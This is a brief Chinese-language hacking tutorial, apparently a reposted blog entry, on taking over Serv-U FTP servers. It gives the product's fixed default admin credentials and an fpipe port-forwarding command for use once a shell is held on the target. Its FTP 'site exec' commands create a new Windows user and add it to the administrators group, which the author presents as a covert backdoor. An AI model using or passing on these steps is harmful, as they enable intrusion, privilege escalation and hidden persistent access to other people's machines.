| 关键词: 机器 目标 LocalAdministrat 192.168 0.1 serv 运行 后门 一个 端口 |
[serv-u默认监听127.0.0.1:43958,所以只有在本机才能连接这个管理端口。serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码在同一个版本中是固定的,也许在不同的版本中也是固定的。假如目标机器IP是192.168.0.1,假如你已经有了一个目标机器的普通权限的SHELL,那么你在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u admin"新建SERVER,192.168.0.1:12345User:LocalAdministratorPass:"#l@$ak#.lk;0@P",那么目标机器的serv-u就归你管了。(不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了] 这种方法我在本地测试呢一下发现效果非常的好~! 转念一想,可以用他做个后门 方法同上 在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u admin"新建SERVER,192.168.0.1:12345User:LocalAdministratorPass:#l@$ak#.lk;0@P 连上后,先建一个用户 目录指向c:\ 给他执行权限 使用方法 cmd ftp 192.168.0.1usernamepasswordftp>cd /winnt/system32ftp>quote site exec net.exe user neeao neeao /addftp>quote site exec net.exe localgroup administrators neeao /add 一个非常隐蔽的后门做成了 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|